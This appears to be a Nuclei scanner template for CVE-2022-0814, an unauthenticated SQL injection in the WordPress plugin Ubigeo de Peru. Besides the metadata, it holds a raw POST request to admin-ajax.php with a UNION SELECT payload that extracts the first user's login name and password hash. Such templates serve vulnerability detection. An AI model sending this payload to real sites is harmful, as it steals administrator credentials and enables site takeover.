58 lines
2.0 KiB
YAML
58 lines
2.0 KiB
YAML
id: CVE-2022-0814
|
|
|
|
info:
|
|
name: Ubigeo de Peru < 3.6.4 - SQL Injection
|
|
author: r3Y3r53
|
|
severity: critical
|
|
description: |
|
|
The plugin does not properly sanitise and escape some parameters before using them in SQL statements via various AJAX actions, some of which are available to unauthenticated users, leading to SQL Injections.
|
|
remediation: Fixed in version 3.6.4
|
|
reference:
|
|
- https://wpscan.com/vulnerability/fd84dc08-0079-4fcf-81c3-a61d652e3269
|
|
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-0814
|
|
- https://wordpress.org/plugins/ubigeo-peru/
|
|
classification:
|
|
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
|
|
cvss-score: 9.8
|
|
cve-id: CVE-2022-0814
|
|
cwe-id: CWE-89
|
|
epss-score: 0.03202
|
|
epss-percentile: 0.90142
|
|
cpe: cpe:2.3:a:ubigeo_de_peru_para_woocommerce_project:ubigeo_de_peru_para_woocommerce:*:*:*:*:*:wordpress:*:*
|
|
metadata:
|
|
verified: true
|
|
max-request: 1
|
|
vendor: ubigeo_de_peru_para_woocommerce_project
|
|
product: ubigeo_de_peru_para_woocommerce
|
|
framework: wordpress
|
|
publicwww-query: "/wp-content/plugins/ubigeo-peru/"
|
|
tags: cve,cve2022,wordpress,wpscan,wp-plugin,sqli,ubigeo-peru,unauth
|
|
|
|
http:
|
|
- raw:
|
|
- |
|
|
POST /wp-admin/admin-ajax.php HTTP/1.1
|
|
Host: {{Hostname}}
|
|
Content-Type: application/x-www-form-urlencoded
|
|
|
|
action=rt_ubigeo_load_distritos_address&idProv=1%20UNION%20SELECT%201,(SELECT%20user_login%20FROM%20wp_users%20WHERE%20ID%20=%201),(SELECT%20user_pass%20FROM%20wp_users%20WHERE%20ID%20=%201)%20from%20wp_users#
|
|
|
|
matchers-condition: and
|
|
matchers:
|
|
- type: word
|
|
part: body
|
|
words:
|
|
- 'idProv'
|
|
- 'idDist'
|
|
- 'distrito'
|
|
condition: and
|
|
|
|
- type: word
|
|
part: header
|
|
words:
|
|
- text/html
|
|
|
|
- type: status
|
|
status:
|
|
- 200
|
|
# digest: 4a0a00473045022041c84b9e45061cb7936c32fc002462b6f7b0f5169a6b0b8702601db14e79c6e0022100957ca8b7284c816e7b3e2e77b1abd199e04f086c351969dff4c3b657cce7aa3d:922c64590222798bb761d5b6d8e72950 |